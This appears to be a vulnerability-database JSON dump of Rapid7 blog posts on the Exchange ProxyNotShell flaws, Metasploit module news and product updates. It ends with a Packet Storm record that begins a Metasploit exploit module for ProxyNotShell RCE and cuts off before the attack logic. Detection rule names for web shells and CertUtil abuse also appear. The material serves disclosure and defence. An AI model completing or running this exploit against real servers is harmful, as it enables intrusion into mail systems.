information](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) on attacks they have observed using these vulnerabilities: \n\n\"MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\"\n\n### Mitigation\n\n_**NOTE: **Microsoft has revised the URL Rewrite rule from their mitigation guidance multiple times since this blog came out. Refer to their instructions for the latest guidance._\n\nBoth CVE-2022-41040 and CVE-2022-41082 are unpatched.** **In the absence of a patch, Microsoft has directed on-premises Exchange customers to apply a blocking rule in \u201cIIS Manager -&gt; Default Web Site -&gt; Autodiscover -&gt; URL Rewrite -&gt; Actions\u201d to block the known attack patterns. Organizations should apply the mitigation as Microsoft directs on an emergency basis. \n\n**Microsoft has [full step-by-step URL Rewrite (mitigation) instructions here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). **These instructions have been updated multiple times\u2014check Microsoft's info for the latest.\n\nMicrosoft has confirmed that the URL Rewrite instructions linked above are successful in breaking current attack chains. Authenticated attackers who can access PowerShell Remoting on vulnerable Exchange systems will be able to trigger RCE using CVE-2022-41082. Blocking the ports used for Remote PowerShell can limit these attacks. Therefore, on-premises Exchange customers should review and apply Microsoft's URL Rewrite Instructions **and** block exposed Remote PowerShell ports:\n\n * HTTP: 5985\n * HTTPS: 5986\n\nMicrosoft also \"strongly recommends\" Exchange Server customers [disable](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>) remote PowerShell access for non-admin users.\n\nMicrosoft has said explicitly that Exchange Online Customers do not need to take any action. Note, however, that organizations who use hybrid (a mix of on-prem and cloud) Exchange environments should follow on-prem guidance. See [Microsoft's official blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for more details. \n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41040 and CVE-2022-41082 with a remote vulnerability check available in the September 30, 2022 content-only release ( Jar UpdateID: 144473189). The check will identify whether Microsoft's recommended mitigations have been applied. Customers can also use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) or [Dynamic Asset Groups](<https://docs.rapid7.com/nexpose/working-with-asset-groups/>) to identify systems that have Exchange installed on them. \n\n**Note: **Microsoft has revised their recommended URL Rewrite rule several times since October 4. Our vulnerability check has been updated as of the **October 12, 2022 content-only** release to identify the improved mitigation in Microsoft's guidance. \n\nThe behavior described in GTSC's blog is similar to other attacks targeting Exchange over the past 18 months. Rapid7\u2019s InsightIDR and Managed Detection &amp; Response (MDR) customers have detection coverage for currently known post-exploitation attacker behaviors, including but not limited to:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Suspicious Process - Exchange Server Spawns Process\n * Attacker Technique - CertUtil With URLCache Flag\n * Webshell - China Chopper Executing Commands\n * Suspicious Process - Executable Runs From C:\\Perflogs\n\nFor InsightIDR customers, we recommend reviewing the rule action and priority of these detection rules to confirm that they align with their security** **needs. As always, MDR customers are being actively monitored by the Rapid7 SOC. If suspicious activity is detected in your environment, you will be contacted by your customer advisor.\n\nWe will update this blog with further information, including coverage additions or enhancements, as needed.\n\n### Updates\n\n**September 30, 2022: **Microsoft has confirmed two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082, are being exploited in \"limited, targeted attacks.\" Microsoft has released mitigation guidance. Our engineering teams are investigating options to allow InsightVM and Nexpose customers to assess exposure to these vulnerabilities. InsightIDR customers have existing detection coverage. \n**[16:30 ET]** Updated information on newly released InsightVM and Nexpose vulnerability checks. \n\n**October 1, 2022: **Clarified wording and directions in _Mitigations _section, added a _Threat intelligence_ section with [Microsoft's analysis](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) of attacks using these vulnerabilities. \n\n**October 4, 2022: **Microsoft published updated mitigation guidance that includes an improvement to their URL Rewrite rule. The string contained in the recommended rule has been modified to be more effective. [Full instructions are here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Our researchers are evaluating whether adjustments to our existing vulnerability checks are required based on Microsoft\u2019s new guidance. \n\n**October 5, 2022: **Our vulnerability check for InsightVM and Nexpose customers will be updated to identify the improved mitigation in Microsoft's revised guidance; this update will go out in the October 5, 2022 content-only release.\n\n**October 11, 2022: **Microsoft made additional improvements to their URL Rewrite rule instructions on October 7 and October 8. Full details are in their [blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The vulnerabilities are still unpatched as of the October 11, 2022 Patch Tuesday release. \n\n**October 12, 2022: **Our engineering team has updated checks for these vulnerabilities in the October 12 content-only release. The updates look for the revised URL Rewrite rule in Microsoft's recommended mitigation guidance. \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-29T20:50:50", "type": "rapid7blog", "title": "CVE-2022-41040 and CVE-2022-41082: Unpatched Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-29T20:50:50", "id": "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "href": "https://blog.rapid7.com/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T18:06:13", "description": "## Zimbra with Postfix LPE (CVE-2022-3569)\n\n\n\nThis week [rbowes](<https://github.com/rbowes-r7>) added an LPE exploit for Zimbra with Postfix. The exploit leverages a vulnerability whereby the Zimbra user can run postfix as root which in turn is capable of executing arbitrary shellscripts. This can be abused for reliable privilege escalation from the context of the `zimbra` service account to `root`. As of this time, this vulnerability remains unpatched.\n\n## Zimbra RCE (CVE-2022-41352)\n\n[rbowes](<https://github.com/rbowes-r7>) also added an RCE for Zimbra as well. This exploit can be used to remotely obtain the initial access necessary to exploit [CVE-2022-3569](<https://attackerkb.com/topics/GcH5KXsy1m/cve-2022-3569?referrer=blog>) and escalate privileges to root. This exploit leverages a path traversal vulnerability to write a malicious JSP file to the web directory which yields code execution. The vulnerability does not require authentication however it should be noted that pax must not be present on the target in order for it to be exploitable. A Zimbra patch adds pax as a requirement, so either the patch must not have been applied or pax must have been explicitly removed.\n\n## FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)\n\nCommunity member [heyder](<https://github.com/heyder>) submitted an exploit for multiple Fortinet products this week. The exploit involves an authentication bypass that is leveraged to establish an SSH session with the target. Unfortunately, the tested FortiGate v7.2.1 instance used during testing indicated that the target could not be used for SSH port forwarding.\n\n## Improved Qualys Scan Import Performance\n\nMetasploit is capable of importing scan data produced by a variety of tools such as Qualys and Nessus. This week [jmartin](<https://github.com/jmartin-r7>) switched the XML parser used while processing Qualys scan files to obtain a dramatic performance improvement. Scans data which previously took hours to import takes only a few minutes now.\n\n## New module content (4)\n\n * [Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera](<https://github.com/rapid7/metasploit-framework/pull/17098>) by Monte Crypto and h00die-gr3y, which exploits [CVE-2017-7921](<https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921?referrer=blog>) \\- This adds an auxiliary module that leverages an authentication bypass vulnerability in Hikvision IP cameras (CVE-2017-7921) to disclose information such as detailed hardware and software configuration, user credentials, and camera snapshots.\n * [Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.](<https://github.com/rapid7/metasploit-framework/pull/17143>) by Heyder Andrade and Zach Hanley, which exploits [CVE-2022-40684](<https://attackerkb.com/topics/QWOxGIKkGx/cve-2022-40684?referrer=blog>) \\- This PR adds a remote code execution exploit module for CVE-2022-40684 affecting some Fortinet products\n * [TAR Path Traversal in Zimbra (CVE-2022-41352)](<https://github.com/rapid7/metasploit-framework/pull/17114>) by Alexander Cherepanov, Ron Bowes, and yeak, which exploits [CVE-2022-41352](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352?referrer=blog>) \\- This adds a module that exploits a symlink-based path traversal vulnerability in `cpio` to get unauthenticated remote code execution as the `zimbra` user. This vulnerability is identified as CVE-2022-41352. The module generates a `.tar` file that will need to be emailed to any user on the target Zimbra server.\n * [Zimbra sudo + postfix privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/17141>) by EvergreenCartoons and Ron Bowes, which exploits [CVE-2022-3569](<https://attackerkb.com/topics/GcH5KXsy1m/cve-2022-3569?referrer=blog>) \\- This adds a new module to exploit a vulnerable sudo configuration in Zimbra that permits the `zimbra` user to execute `postfix` as root. In turn, `postfix` can execute arbitrary shell scripts and get command execution as the root user. Currently, as of 2022-10-14, all versions of Zimbra are vulnerable.\n\n## Enhancements and features (4)\n\n * [#16982](<https://github.com/rapid7/metasploit-framework/pull/16982>) from [h00die](<https://github.com/h00die>) \\- Updates the Dell iDRAC login scanner to work with version 8 and version 9\n * [#17135](<https://github.com/rapid7/metasploit-framework/pull/17135>) from [k0pak4](<https://github.com/k0pak4>) \\- This adds proper namespace to the hash identification library to avoid any potential collision with the constants defined previously.\n * [#17140](<https://github.com/rapid7/metasploit-framework/pull/17140>) from [nfsec](<https://github.com/nfsec>) \\- The Metasploit Docker image's Alpine version has been bumped from 3.12 to 3.15.\n * [#17154](<https://github.com/rapid7/metasploit-framework/pull/17154>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- The process for importing Qualys scan data has been switched over from `REXML` to using `Nokigiri::XML` and XPath for improved performance.\n\n## Bugs fixed (1)\n\n * [#17157](<https://github.com/rapid7/metasploit-framework/pull/17157>) from [k0pak4](<https://github.com/k0pak4>) \\- Setting the global options to set LHOST for all modules will now be properly respected when loading a module, whereas before only the globally set RHOST option would be respected.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.22...6.2.23](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-10-12T21%3A51%3A32-05%3A00..2022-10-20T10%3A01%3A43-05%3A00%22>)\n * [Full diff 6.2.22...6.2.23](<https://github.com/rapid7/metasploit-framework/compare/6.2.22...6.2.23>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T17:31:54", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7921", "CVE-2022-3569", "CVE-2022-40684", "CVE-2022-41352"], "modified": "2022-10-21T17:31:54", "id": "RAPID7BLOG:061F409DE97071CC9A744DAF87C512FD", "href": "https://blog.rapid7.com/2022/10/21/metasploit-weekly-wrap-up-181/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-09T20:11:17", "description": "\n\n2022 began on a solemn note \u2014 many organizations across the globe were recovering from the [Log4Shell zero-day vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). For the InsightVM and Nexpose team, 2022 began with a lot of introspection on how we can add more value and keep meeting our customer needs in the best possible ways. This means we continue to prioritize what really matters, even if it means making some hard decisions, and further improve communication with our customers.\n\nOver the course of 2022, we launched many new features and improvements \u2014 some highly anticipated, many customer-requested. Log4j was difficult but we learnt from it to be quicker and better with our emergent threat response. [Rapid7 recently refreshed our coordinated vulnerability disclosure (CVD) policy and philosophy](<https://www.rapid7.com/blog/post/2022/12/28/refreshing-rapid7s-coordinated-vulnerability-disclosure-policy/>). As we ran into more edgy kinds of vulnerabilities, we learnt that we couldn't treat them all as equal and there is a need to be more agile with our CVD approach. So we came up with six classes of vulnerabilities (and a meta-classification of \"more than one\") and some broad strokes of what we intend to accomplish with our CVD for each of them.\n\nWe reimagined many of our internal processes and teams to drive better customer outcomes. For instance, we are making a significant investment in re-architecting the InsightVM/Nexpose database to ensure VM programs scale with the customers evolving IT environment.\n\nHere\u2019s a snapshot of 2022 in InsightVM:\n\n### Key Product Improvements\n\n****Agent-based policy**** ****assessment****\n\nA robust vulnerability management program should assess IT assets for misconfigurations along with vulnerabilities. That's why we were thrilled to introduce [Agent-Based Policy in InsightVM](<https://docs.rapid7.com/insightvm/assess-with-agent-based-policies/>). Customers can now use Insight Agents to conduct configuration assessments of IT assets against widely used industry benchmarks from the Center for Internet Security (CIS) and the U.S. Defense Information Systems Agency (DISA) to help prevent breaches and ensure compliance.\n\n\n\n**Remediation Project improvements**\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). [Here are our favorite updates](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>):\n\n * ****Remediator Export -**** a new solution-based CSV export option, Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution.\n * ****Better way to track project progress -**** The new metric that calculates progress for Remediation Projects will advance for each individual asset remediated within a \u201csolution\" group. This means customers no longer have to wait for all the affected assets to be remediated to see progress.\n\n\n****Scan Assistant****\n\n[Scan Assistant](<https://www.rapid7.com/globalassets/_pdfs/product-and-service-briefs/extend_vulnerability_coverage_scan_assistant.pdf>) provides an innovative alternative to traditional credentialed scanning. Instead of account-based credentials, it uses digital certificates, which increases security and simplifies administration for authenticated scans.\n\n * ****Scan Assistant is now generally available for Linux****\n * ****Automatic Scan Assistant credential generation -**** taking some more burden off the vulnerability management teams, customers can use the Shared Credentials management UI to automatically generate Scan Assistant credentials\n * ****Improved scalability -**** automated Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants.\n\n**Dashboards and reports**\n\nCustomers like to use dashboards to visualize the impact of a specific vulnerability or vulnerabilities to their environment, and we made quite a few updates in that area:\n\n * ****New dashboard cards based on CVSS v3 severity -**** we [expanded CVSS dashboard cards](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) to include a version that sorts the vulnerabilities based on CVSS v3 scores (along with CVSS v2 scores).\n * ****Threat feed dashboard includes CISA's KEV catalog -**** we extended the scope of vulnerabilities tracked to [incorporate CISA's KEV catalog](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>) in the InsightVM Threat Feed Dashboard to help customers prioritize faster.\n * ****5 New Dashboard Cards -**** We launched a set of five new dashboard cards that utilize line charts to show trends in vulnerability severity and allow for easy comparison when reporting.\n * ****Distribute Reports via Email -**** Customers can now send InsightVM reports to their teammates through email.\n\n\n**Agent improvements for virtual desktops**\n\nPandemic fueled remote work and with it the use of virtual desktops. InsightVM can now identify [agent-based assets that are Citrix VDI](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) instances and correlate them to the user, enabling more accurate asset/instance tagging. This will create a smooth, streamlined experience for organizations that deploy and scan Citrix VDIs. Expect similar improvements for VMware Horizon VDIs in 2023.\n\n**Improved support**\n\nA new, opt-in feature eliminates the need for customers to attach logs to support cases and/or send logs manually, ensuring a faster, more intuitive support process.\n\n### Notable Emergent Threat Responses and Recurring Coverages\n\nIn 2022, we added support for enterprise systems like Windows Server 2022, AlmaLinux, VMware Horizon (server and client), and more to the recurring coverage list. Learn about the systems with [recurring coverage](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>).\n\nRapid7's Emergent Threat Response (ETR) program is part of an ongoing process to deliver fast, expert analysis alongside first-rate security content for the highest-priority security threats. This year we flagged a number of critical vulnerabilities. To list a few:\n\n * [Microsoft Exchange Server Server-Side Request Forgery](<https://www.rapid7.com/blog/post/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and Remote Code Execution (CVE-2022-41040 and CVE-2022-41082)\n * [OpenSSL Buffer Overflows](<https://www.rapid7.com/blog/post/2022/11/01/cve-2022-3786-and-cve-2022-3602-two-high-severity-buffer-overflows-in-openssl-fixed/>) (CVE-2022-3786 and CVE-2022-3602)\n * [Confluence Server and Data Center Unauthenticated Remote Code Execution](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) (CVE-2022-26134)\n * [Fortinet FortiOS Authentication Bypass](<https://www.rapid7.com/blog/post/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/>) (FortiGate, FortiProxy, FortiSwitch Manager) (CVE-2022-40684)\n\nThat's not all. We added over 21,000 new checks across close to 9000 CVEs to help customers understand their risk better and thus secure better.\n\nCheck out our past blogs - [Q1](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>), [Q2](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>), and [Q3](<https://www.rapid7.com/blog/post/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/>) \\- to get more information on product improvements and key vulnerability coverages.\n\n### Customer Stories and Resources\n\nThe past year, we had the privilege to share stories of how our customers are using Insight VM to secure their environment. [Check out how your peers are leveraging InsightVM](<https://www.rapid7.com/customers/customer-stories/?page=1&p=InsightVM>).Here's what one customer had to say:\n\n### \u201cThat is one of the things we value most about InsightVM; it has the capacity to pinpoint actively-exploited vulnerabilities, so we can prioritize and direct our attention where it's needed most.\" - _[Daniel Hernandez, Information Security Analyst III at Pioneer Telephone Cooperative, Inc](<https://www.rapid7.com/customers/pioneer-telephone-cooperative/>)._\n\nFor customers looking to improve the utilization of the Vulnerability Management tool, check out this webcast series that covers the different phases of VM lifecycle - [Discovery](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/insightvm-customer-webcast-vulnerability-management-lifecycle-discovery>), [Analyze](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-analyze>), [Communicate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-communicate>), and [Remediate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-remediate>). Lastly, customers can always leverage [Rapid7 Academy to participate in workshops](<https://academy.rapid7.com/page/product-workshops#rapid7-product_insightvm>) and training to continue their learning journey.\n\n### Looking forward to 2023\n\nWe will maintain the customer-centricity in 2023 as we continue to deliver features and improvements in customers' best interests. We will be holding a [webinar](<https://information.rapid7.com/agent-based-policy-webinar-register.html>) on January 24 around configuration assessment in InsightVM agent-based policy. And, as always, be on the lookout for our annual vulnerability intelligence report coming soon to a Q1 near you ([here's last year's](<https://www.rapid7.com/info/2021-vulnerability-intelligence-report/>))!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-09T17:00:00", "type": "rapid7blog", "title": "Year in Review: Rapid7 Vulnerability Management", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-26134", "CVE-2022-3602", "CVE-2022-3786", "CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-09T17:00:00", "id": "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "href": "https://blog.rapid7.com/2023/01/09/year-in-review-vulnerability-management/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-20T22:06:00", "description": "![\\[Security Nation\\] James Kettle of PortSwigger on Advancing Web-Attack Research](https://blog.rapid7.com/content/images/2022/10/security_nation_logo.jpg)\n\nIn this episode of Security Nation, Jen and Tod talk to James Kettle of PortSwigger. Their discussion includes research for new web-attack techniques and how those get field tested (hint: bug bounties). The research is kept fresh from donations gleaned from the bug bounty field tests. PortSwigger validates their research in the real world, and those advances in web-attack techniques are published and disseminated in and effort to fix bugs and misconfigurations.\n\nStick around for the Rapid Rundown, where Tod and Jen talk about the recent Fortinet advisory concerning the \"silent patching\" of bugs without disclosure of any real details \u2013 only to have attackers go and reverse it all anyway. \n\n## James Kettle\n\n![\\[Security Nation\\] James Kettle of PortSwigger on Advancing Web-Attack Research](https://blog.rapid7.com/content/images/2022/10/Screen-Shot-2022-10-11-at-3.49.09-PM-2.png)\n\nJames 'albinowax' Kettle is Director of Research at PortSwigger. His latest work includes browser-powered desync attacks and web-cache poisoning. James has extensive experience cultivating novel attack techniques, including RCE via Server-Side Template Injection and abusing the HTTP Host header to poison password reset emails and server-side caches. James is also the author of various popular open-source tools including Param Miner, Turbo Intruder, and HTTP Request Smuggler. He is a frequent speaker at numerous prestigious venues, including both Black Hat USA and EU, OWASP AppSec USA and EU, and DEFCON.\n\n## Show notes\n\n****Interview links****\n\n * Prior Security Nation episode in which loads of Portswigger references were dropped: \n\n * https://www.rapid7.com/blog/post/2021/08/18/security-nation-daniel-crowley/ \n\n * New research from James about browser-powered desync attacks: \n\n * https://portswigger.net/research/browser-powered-desync-attacks\n\n****Rapid Rundown links****\n\n * Semi-secret Fortinet advisory: <https://twitter.com/Gi7w0rm/status/1578398457227878407> \n\n * CVE Details as they come: <https://www.rapid7.com/blog/post/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/> \n\n * Existence of Fortinet CVE-2022-40684 PoC posted, but not the PoC itself: <https://twitter.com/Horizon3Attack/status/1579285863108087810> \n\n * The Hidden Harms of Silent Patches: <https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>\n\nLike the show? Want to keep Jen and Tod in the podcasting business? Feel free to rate and review with your favorite podcast purveyor, like [****Apple Podcasts****](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784#see-all/reviews>).\n\n#### Want More Inspiring Stories From the Security Community?\n\n[Subscribe to Security Nation Today](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T18:05:46", "type": "rapid7blog", "title": "[Security Nation] James Kettle of PortSwigger on Advancing Web-Attack Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-12T18:05:46", "id": "RAPID7BLOG:2BF1C4EA2B7AB37B7A16840E193AAC4B", "href": "https://blog.rapid7.com/2022/10/12/security-nation-james-kettle-of-portswigger-on-advancing-web-attack-research/", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2022-11-30T21:04:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-30T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyNotShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-30T00:00:00", "id": "PACKETSTORM:170066", "href": "https://packetstormsecurity.com/files/170066/Microsoft-Exchange-ProxyNotShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HTTP::Exchange \ninclude Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyNotShell RCE', \n'Description' => %q{ \nThis module chains two vulnerabilities on Microsoft Exchange Server \nthat, when combined, allow an authenticated attacker to interact with \nthe Exchange Powershell backend (CVE-2022-41040), where a \ndeserialization flaw can be leveraged to obtain code execution \n(CVE-2022-41082). This exploit only support Exchange Server 2019. \n \nThese vulnerabilities were patched in November 2022. \n}, \n'Author' => [ \n'Orange Tsai', # Discovery of ProxyShell SSRF \n'Spencer McIntyre', # Metasploit module \n'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis \n'Piotr Bazyd\u0142o', # Vulnerability analysis \n'Rich Warren', # EEMS bypass via ProxyNotRelay \n'Soroush Dalili' # EEMS bypass \n], \n'References' => [ \n[ 'CVE', '2022-41040' ], # ssrf \n[ 'CVE', '2022-41082' ], # rce \n[ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ], \n[ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ], \n[ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ], \n[ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ] \n], \n'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyNotShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'A specific 